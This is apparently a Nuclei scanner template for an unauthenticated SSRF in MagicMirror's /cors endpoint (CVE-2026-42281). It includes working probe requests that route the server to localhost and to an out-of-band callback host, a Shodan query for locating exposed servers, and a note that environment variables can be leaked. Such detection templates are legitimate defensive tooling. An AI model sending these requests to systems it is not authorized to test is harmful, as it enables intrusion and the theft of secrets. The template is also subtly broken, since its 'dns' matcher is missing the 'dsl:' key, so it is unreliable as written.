id: CVE-2026-42281

info:
  name: MagicMirror <= 2.35.0 - Server-Side Request Forgery
  author: aleff-github
  severity: critical
  description: |
    An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (VAR_NAME), enabling exfiltration of server-side secrets.
  impact: |
    A remote unauthenticated attacker can force the MagicMirror server to request localhost, internal network, and cloud metadata endpoints. In affected configurations, the endpoint can return server-side responses to the attacker.
  remediation: |
    Upgrade MagicMirror to version 2.36.0 or later.
  reference:
    - https://github.com/advisories/GHSA-ph6f-2cvq-79hq
    - https://github.com/MagicMirrorOrg/MagicMirror/security/advisories/GHSA-ph6f-2cvq-79hq
    - https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0
    - https://osv.dev/vulnerability/GHSA-ph6f-2cvq-79hq
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-42281
    epss-score: 0.0326
    epss-percentile: 0.8738
    cwe-id: CWE-918
  metadata:
    max-request: 2
    verified: true
    product: magicmirror
    vendor: magicmirrororg
    shodan-query: 'http.title:"MagicMirror"'
  tags: cve,cve2026,magicmirror,ssrf,unauth,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: word
        part: body
        words:
          - "MagicMirror"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cors?url=http://127.0.0.1:8080/version"
      - "{{BaseURL}}/cors?url=http://{{interactsh-url}}/version"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        name: version
        dsl:
          - regex('^(?:[01]\.[0-9]+\.[0-9]+|2\.(?:[0-9]|[12][0-9]|3[0-5])\.[0-9]+)\s*$', body)
          - status_code == 200
        condition: and

      - type: dsl
        name: dns
          - "contains(interactsh_protocol,'dns')"
          - status_code == 200
        condition: and
# digest: 490a0046304402200b12223794abf1a390d6f52c424d887002d5a8003c0bd33a3a45dcffb22778e502203060ddb15d24a7a2e5f1ba7f25e7714b0ed01615252ac4aa7783d479cc9a74ee:922c64590222798bb761d5b6d8e72950